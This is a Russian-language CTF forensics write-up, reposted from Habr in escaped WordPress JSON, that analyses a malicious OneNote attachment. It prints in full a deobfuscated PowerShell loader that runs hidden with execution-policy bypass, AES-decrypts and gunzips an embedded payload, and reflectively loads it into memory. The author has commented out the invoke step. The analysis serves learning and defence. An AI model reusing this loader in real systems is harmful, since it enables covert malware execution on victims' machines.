\u0414\u0430\u0432\u0430\u0439\u0442\u0435 \u043d\u0430\u0439\u0434\u0435\u043c \u043f\u0440\u0438\u0447\u0438\u043d\u0443, \u043f\u043e\u0447\u0435\u043c\u0443 \u0434\u0435\u043b\u0430 \u041f\u0430\u043d\u0434\u043e\u0440\u044b \u043f\u043e\u0448\u043b\u0438 \u043d\u0435 \u0442\u0430\u043a, \u043a\u0430\u043a \u043e\u043d\u0430 \u0445\u043e\u0442\u0435\u043b\u0430, \u0434\u043b\u044f \u044d\u0442\u043e\u0433\u043e \u0437\u0430\u0433\u0440\u0443\u0437\u0438\u043c \u0444\u0430\u0439\u043b \u0432\u043b\u043e\u0436\u0435\u043d\u0438\u044f \u0438\u0437 \u043f\u0438\u0441\u044c\u043c\u0430.<\/p>\n
\u0427\u0442\u043e\u0431\u044b \u0437\u0430\u0433\u0440\u0443\u0437\u0438\u0442\u044c \u0444\u0430\u0439\u043b \u0432\u043b\u043e\u0436\u0435\u043d\u0438\u044f, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043f\u0440\u0438\u0441\u043b\u0430\u043b\u0438 \u041f\u0430\u043d\u0434\u043e\u0440\u0435, \u043d\u0443\u0436\u043d\u043e \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0442\u044c \u0447\u0435\u0440\u0435\u0437 \u043f\u043e\u0434\u043d\u044f\u0442\u044b\u0439 \u0432 \u0437\u0430\u0434\u0430\u043d\u0438\u0438 \u043a\u043e\u043d\u0442\u0435\u0439\u043d\u0435\u0440. \u0412\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u0441\u044f\u00a0wget\u00a0\u0438 \u0432 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u043f\u0440\u043e\u043a\u0441\u0438-\u0441\u0435\u0440\u0432\u0435\u0440\u0430 \u0443\u043a\u0430\u0436\u0435\u043c \u0430\u0434\u0440\u0435\u0441 \u0438 \u043f\u043e\u0440\u0442 \u043a\u043e\u043d\u0442\u0435\u0439\u043d\u0435\u0440\u0430:<\/p>\n
wget http:\/\/relicmaps.htb:\/relicmaps.one -e use_proxy=yes -e http_proxy=167.71.143.44:32619<\/code><\/pre>\n
\u041f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u0444\u0430\u0439\u043b \u0442\u0438\u043f\u0430\u00a0OneNote. \u041f\u043e\u0441\u043c\u043e\u0442\u0440\u0438\u043c, \u0447\u0442\u043e \u0432\u043d\u0443\u0442\u0440\u0438, \u0434\u043b\u044f \u044d\u0442\u043e\u0433\u043e \u0432\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u0441\u044f \u0443\u0442\u0438\u043b\u0438\u0442\u043e\u0439\u00a0strings.<\/p>\n
\n
\u0421\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0435 \u0444\u0430\u0439\u043b\u0430 relicmaps.one.<\/figcaption><\/div>\n<\/figure>\n
\u0417\u0434\u0435\u0441\u044c \u043c\u044b \u0432\u0438\u0434\u0438\u043c\u00a0VBScript\u00a0\u0438 \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u0443\u044e \u0444\u0443\u043d\u043a\u0446\u0438\u044e\u00a0\u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u0433\u043e \u0438\u0441\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f AutoOpen, \u0442\u0430\u043a\u0436\u0435 \u043d\u0430\u0431\u043b\u044e\u0434\u0430\u0435\u043c \u0444\u0443\u043d\u043a\u0446\u0438\u0438 \u043f\u043e \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044e \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430 \u0447\u0435\u0440\u0435\u0437\u00a0WMI\u00a0\u0438 \u043a\u043e\u0434 \u0434\u043b\u044f \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0445 \u0444\u0430\u0439\u043b\u043e\u0432, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0437\u0430\u0433\u0440\u0443\u0437\u044f\u0442\u0441\u044f \u0441\u0440\u0430\u0437\u0443 \u043f\u043e\u0441\u043b\u0435 \u0442\u043e\u0433\u043e, \u043a\u0430\u043a \u0434\u0430\u043d\u043d\u044b\u0439 \u0444\u0430\u0439\u043b \u0431\u0443\u0434\u0435\u0442 \u043e\u0442\u043a\u0440\u044b\u0442 \u043d\u0430\u0448\u0435\u0439 \u041f\u0430\u043d\u0434\u043e\u0440\u043e\u0439.<\/p>\n
\u0414\u0430\u0432\u0430\u0439\u0442\u0435 \u0441\u043a\u0430\u0447\u0430\u0435\u043c \u0434\u0430\u043d\u043d\u044b\u0435 \u0444\u0430\u0439\u043b\u044b, \u0432\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u0441\u044f \u0430\u043d\u0430\u043b\u043e\u0433\u0438\u0447\u043d\u043e\u0439 \u0440\u0430\u043d\u0435\u0435 \u043a\u043e\u043c\u0430\u043d\u0434\u0435 \u0441 \u0443\u0442\u0438\u043b\u0438\u0442\u043e\u0439\u00a0wget.<\/p>\n
\u041c\u044b \u043f\u043e\u043b\u0443\u0447\u0438\u043c \u043f\u0430\u0440\u0443 \u0444\u0430\u0439\u043b\u043e\u0432:\u00a0topsecret-maps.one<\/strong>\u00a0&\u00a0window.bat<\/strong>. \u0421\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0435\u00a0topsecret-maps.one\u00a0<\/strong>\u0441\u0445\u043e\u0436\u0435\u00a0\u0441 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u044b\u043c \u0440\u0430\u043d\u0435\u0435 \u0438\u0441\u0441\u043b\u0435\u0434\u0443\u0435\u043c\u043e\u0433\u043e \u0444\u0430\u0439\u043b\u0430 relicmaps.one \u0438 \u043d\u0435 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u043d\u0438\u043a\u0430\u043a\u043e\u0439 \u0446\u0435\u043d\u043d\u043e\u0441\u0442\u0438, \u0441\u0441\u044b\u043b\u043a\u0438 \u0431\u0438\u0442\u044b\u0435 \u0438 \u0444\u0430\u0439\u043b\u043e\u0432 \u0442\u0430\u043a\u0438\u0445 \u0443\u0436\u0435 \u043d\u0435 \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u0435\u0442, \u043a \u0442\u043e\u043c\u0443 \u0436\u0435 \u0440\u0435\u0441\u0443\u0440\u0441\u044b \u0432\u043f\u043e\u043b\u043d\u0435 \u043b\u0435\u0433\u0438\u0442\u0438\u043c\u043d\u044b\u0435.<\/p>\n
\n
\u0421\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0435 topsecret-maps.one<\/strong><\/figcaption><\/div>\n<\/figure>\n
\u0410 \u0432\u043e\u0442 \u0444\u0430\u0439\u043b window.bat<\/strong> (\u0437\u0430\u0433\u0440\u0443\u0436\u0435\u043d \u0440\u0430\u043d\u0435\u0435) \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u0442 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u044b\u0435 \u0441\u0442\u0440\u043e\u043a\u0438, \u0438\u0437 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0441\u0440\u0430\u0437\u0443 \u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u0441\u044f \u043f\u043e\u043d\u044f\u0442\u043d\u043e, \u0447\u0442\u043e\u00a0\u0434\u0336\u0430\u0336\u043b\u0336\u044c\u0336\u0448\u0336\u0435\u0336 \u0336\u0431\u0336\u0443\u0336\u0434\u0336\u0435\u0336\u0442\u0336 \u0336\u0438\u0336\u043d\u0336\u0442\u0336\u0435\u0336\u0440\u0336\u0435\u0336\u0441\u0336\u043d\u0336\u0435\u0336\u0435\u0336\u00a0\u0432 \u0441\u043a\u0440\u0438\u043f\u0442\u0435 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442\u0441\u044f \u0434\u0435\u043e\u0431\u0444\u0443\u0441\u043a\u0430\u0446\u0438\u044f \u0441\u0442\u0440\u043e\u043a.<\/p>\n
<\/figure>\n
\u0412\u044b\u0432\u0435\u0434\u0435\u043c \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0435 \u043f\u043e\u0441\u043b\u0435 \u0434\u0435\u043e\u0431\u0444\u0443\u0441\u043a\u0430\u0446\u0438\u0438, \u0434\u043b\u044f \u044d\u0442\u043e\u0433\u043e \u0434\u043e\u043f\u0438\u0448\u0435\u043c\u00a0echo\u00a0\u043f\u0435\u0440\u0435\u0434 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u043c\u0438 \u0442\u0440\u0435\u043c\u044f \u0441\u0442\u0440\u043e\u043a\u0430\u043c\u0438 \u0438 \u0441\u043e\u0442\u0440\u0435\u043c cls, \u043f\u043e\u0441\u043b\u0435 \u0437\u0430\u043f\u0443\u0441\u0442\u0438\u043c \u043d\u0430 \u0432\u0438\u0440\u0442\u0443\u0430\u043b\u044c\u043d\u044b\u0439 \u043c\u0430\u0448\u0438\u043d\u0435. \u041f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0435 \u0441\u0442\u0440\u043e\u043a\u0438 \u0438 \u043a\u043e\u043c\u0430\u043d\u0434\u043b\u0435\u0442\u044b:<\/p>\n
copy C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe \/y \"C:\\Users\\Antony\\Desktop\\window.bat.exe\"  cd \"C:\\Users\\Antony\\Desktop\\\"  \"window.bat.exe\" -noprofile -windowstyle hidden -ep bypass -command  $eIfqq = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\\Users\\Antony\\Desktop\\window.bat').Split([Environment]::NewLine); foreach ($YiLGW in $eIfqq) { if ($YiLGW.StartsWith(':: ')) {  $VuGcO = $YiLGW.Substring(3); break; }; }; $uZOcm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($VuGcO); $BacUA = New-Object System.Security.Cryptography.AesManaged; $BacUA.Mode = [System.Security.Cryptography.CipherMode]::CBC; $BacUA.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7; $BacUA.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0xdfc6tTBkD+M0zxU7egGVErAsa\/NtkVIHXeHDUiW20='); $BacUA.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2hn\/J717js1MwdbbqMn7Lw=='); $Nlgap = $BacUA.CreateDecryptor(); $uZOcm = $Nlgap.TransformFinalBlock($uZOcm, 0, $uZOcm.Length); $Nlgap.Dispose(); $BacUA.Dispose(); $mNKMr = New-Object System.IO.MemoryStream(, $uZOcm); $bTMLk = New-Object System.IO.MemoryStream; $NVPbn = New-Object System.IO.Compression.GZipStream($mNKMr, [IO.Compression.CompressionMode]::Decompress); $NVPbn.CopyTo($bTMLk); $NVPbn.Dispose(); $mNKMr.Dispose(); $bTMLk.Dispose(); $uZOcm = $bTMLk.ToArray(); $gDBNO = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($uZOcm); $PtfdQ = $gDBNO.EntryPoint; #$PtfdQ.Invoke($null, (, [string[]] ('')))<\/code><\/pre>\n
\u0414\u0430\u0432\u0430\u0439\u0442\u0435 \u0440\u0430\u0437\u0431\u0435\u0440\u0435\u043c\u0441\u044f, \u0447\u0442\u043e \u043f\u0440\u043e\u0438\u0441\u0445\u043e\u0434\u0438\u0442 \u0432 \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u0438.<\/p>\n
\u0418\u0437 \u0444\u0430\u0439\u043b\u0430 \u0432 \u0441\u043a\u0440\u044b\u0442\u043e\u043c \u0440\u0435\u0436\u0438\u043c\u0435 \u0441\u0447\u0438\u0442\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u0442\u0435\u043a\u0441\u0442 \u0438 \u0434\u0435\u043e\u0431\u0444\u0443\u0441\u0446\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u0432 \u0446\u0438\u043a\u043b\u0435\u00a0<\/p>\n
foreach ($YiLGW in $eIfqq) {  if ($YiLGW.StartsWith(':: ')) {   $VuGcO = $YiLGW.Substring(3); break;  }; };<\/code><\/pre>\n
\u041f\u043e\u0441\u043b\u0435 \u0447\u0435\u0433\u043e \u0434\u0430\u043d\u043d\u044b\u0439 \u0442\u0435\u043a\u0441\u0442 \u0432 \u043a\u043e\u043d\u0432\u0435\u0440\u0442\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u0438\u0437 \u0444\u043e\u0440\u043c\u0430\u0442\u0430\u00a0Base64 \u0438 \u0437\u0430\u043f\u0438\u0441\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u0432 \u043f\u0435\u0440\u0435\u043c\u0435\u043d\u043d\u0443\u044e\u00a0$uZOcm.<\/p>\n
\u0414\u0430\u043b\u0435\u0435 \u043d\u0430\u0447\u0438\u043d\u0430\u0435\u0442\u0441\u044f \u0441\u0430\u043c\u043e\u0435 \u0432\u043a\u0443\u0441\u043d\u043e\u0435, \u0441\u043e\u0437\u0430\u0434\u0435\u0442\u0441\u044f \u043e\u0431\u044a\u0435\u043a\u0442\u00a0System.Security.Cryptography.AesManaged, \u0437\u0430\u0434\u0430\u0435\u0442\u0441\u044f\u00a0mode\u00a0CBC, \u043a\u043b\u044e\u0447 \u0438 \u0432\u0435\u043a\u0442\u043e\u0440 \u0434\u043b\u044f \u0440\u0430\u0441\u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u0434\u0435\u043a\u043e\u0434\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0433\u043e \u0440\u0430\u043d\u0435\u0435 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0433\u043e, \u0434\u0430\u043d\u043d\u044b\u0439 \u043c\u0430\u0441\u0441\u0438\u0432 \u0431\u0430\u0439\u0442\u043e\u0432 \u0437\u0430\u043f\u0438\u0441\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u0432 \u043f\u0435\u0440\u0435\u043c\u0435\u043d\u043d\u0443\u044e $uZOcm.
\u0412 \u043a\u043e\u043d\u0435\u0447\u043d\u043e\u043c \u0438\u0442\u043e\u0433\u0435 \u043c\u044b \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u0438\u0441\u043f\u043e\u043b\u043d\u044f\u0435\u043c\u044b\u0439 \u043a\u043e\u0434 \u0432 \u043f\u0430\u043c\u044f\u0442\u0438 (\u043f\u0435\u0440\u0435\u043c\u0435\u043d\u043d\u0430\u044f $PtfdQ) \u0438 $PtfdQ.Invoke\u00a0\u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0438\u0441\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u0434\u0430\u043d\u043d\u044b\u0439 \u043a\u043e\u0434, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u043f\u0440\u0438 \u0442\u0435\u0441\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0438 \u043c\u044b \u044d\u0442\u0443 \u0441\u0442\u0440\u043e\u043a\u0443 \u0437\u0430\u043a\u043e\u043c\u043c\u0435\u043d\u0442\u0438\u0440\u0443\u0435\u043c.<\/p>\n
<\/figure>\n
\u0414\u0430\u0432\u0430\u0439\u0442\u0435 \u0432\u0435\u0440\u043d\u0435\u043c\u0441\u044f \u043d\u0430 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0448\u0430\u0433\u043e\u0432 \u043d\u0430\u0437\u0430\u0434 \u0432 \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u0438, \u0433\u0434\u0435 \u043c\u044b \u043c\u044b \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0438 \u043c\u0430\u0441\u0441\u0438\u0432 \u0431\u0430\u0439\u0442\u043e\u0432, \u0438 \u0437\u0430\u043f\u0438\u0448\u0435\u043c \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0435 \u044d\u0442\u043e\u0439 \u043f\u0435\u0440\u0435\u043c\u0435\u043d\u043d\u043e\u0439 \u0432 \u0444\u0430\u0439\u043b OutFile.dat \u043f\u0440\u0438 \u043f\u043e\u043c\u043e\u0449\u0438 \u043a\u043e\u043c\u0430\u043d\u0434\u043b\u0435\u0442\u0430\u00a0Set-Content \u0443\u043a\u0430\u0437\u0430\u0432 \u043a\u043e\u0434\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 Byte:<\/p>\n
Set-Content -Path OutFile.dat -Value $uZOcm -Encoding Byte<\/code><\/pre>\n
\u0423\u0442\u0438\u043b\u0438\u0442\u0430 HxD \u043f\u043e\u043a\u0430\u0437\u044b\u0432\u0430\u044e\u0442 \u043d\u0430\u043c \u0437\u0430\u0433\u043e\u043b\u043e\u0432\u043e\u043a \u0438\u0441\u043f\u043e\u043b\u043d\u044f\u0435\u043c\u043e\u0433\u043e \u0444\u0430\u0439\u043b\u0430 MZ.<\/p>\n
<\/figure>\n
\u041f\u043e\u0441\u043c\u043e\u0442\u0440\u0438\u043c \u044f\u0437\u044b\u043a, \u043d\u0430 \u043a\u043e\u0442\u043e\u0440\u043e\u043c \u043d\u0430\u043f\u0438\u0441\u0430\u043d \u0444\u0430\u0439\u043b \u0438 \u043d\u0430\u043b\u0438\u0447\u0438\u0435 \u043f\u0430\u043a\u0435\u0440\u043e\u0432 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0443\u0442\u0438\u043b\u0438\u0442\u044b\u00a0Detect\u00a0It\u00a0Easy.<\/p>\n
<\/figure>\n
\u0418\u0441\u043f\u043e\u043b\u043d\u044f\u0435\u043c\u044b\u0439 \u0444\u0430\u0439\u043b \u043d\u0430\u043f\u0438\u0441\u0430\u043d \u043d\u0430 \u044f\u0437\u044b\u043a\u0435 \u00a0\u0421# \u0438 \u043d\u0435 \u0443\u043f\u0430\u043a\u043e\u0432\u0430\u043d, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u043c\u043e\u0436\u0435\u043c \u0432\u0437\u0433\u043b\u044f\u043d\u0443\u0442\u044c \u043d\u0430 \u0435\u0433\u043e \u043a\u043e\u0434 \u0432\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0432\u0448\u0438\u0441\u044c \u0443\u0442\u0438\u043b\u0438\u0442\u043e\u0439\u00a0dnSpy.<\/p>\n
<\/figure>\n
\u0418 \u0437\u0434\u0435\u0441\u044c \u043d\u0430\u0441 \u0441 \u0432\u0430\u043c\u0438 \u0436\u0434\u0435\u0442 \u0444\u043b\u0430\u0433! =)
\u0412\u043e\u0442 \u0442\u0430\u043a\u0430\u044f \u043d\u0435\u0441\u043b\u043e\u0436\u043d\u0430\u044f \u0437\u0430\u0434\u0430\u0447\u043a\u0430 \u0443\u0440\u043e\u0432\u043d\u044f\u00a0medium\u00a0\u043f\u043e\u043f\u0430\u043b\u0430\u0441\u044c \u043d\u0430 \u044d\u0442\u043e\u043c\u00a0CTF\u00a0\u0432 \u0440\u0430\u0437\u0434\u0435\u043b\u0435\u00a0Forensics.<\/p>\n<\/div>\n<\/div>\n<\/div>\n
  <\/div>\n
  
 \u0441\u0441\u044b\u043b\u043a\u0430 \u043d\u0430 \u043e\u0440\u0438\u0433\u0438\u043d\u0430\u043b \u0441\u0442\u0430\u0442\u044c\u0438  https:\/\/habr.com\/ru\/post\/724718\/<\/a>
<\/br><\/br><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[],"tags":[],"class_list":["post-347266","post","type-post","status-publish","format-standard","hentry"],"_links":{"self":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts\/347266","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=347266"}],"version-history":[{"count":0,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts\/347266\/revisions"}],"wp:attachment":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=347266"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=347266"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=347266"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}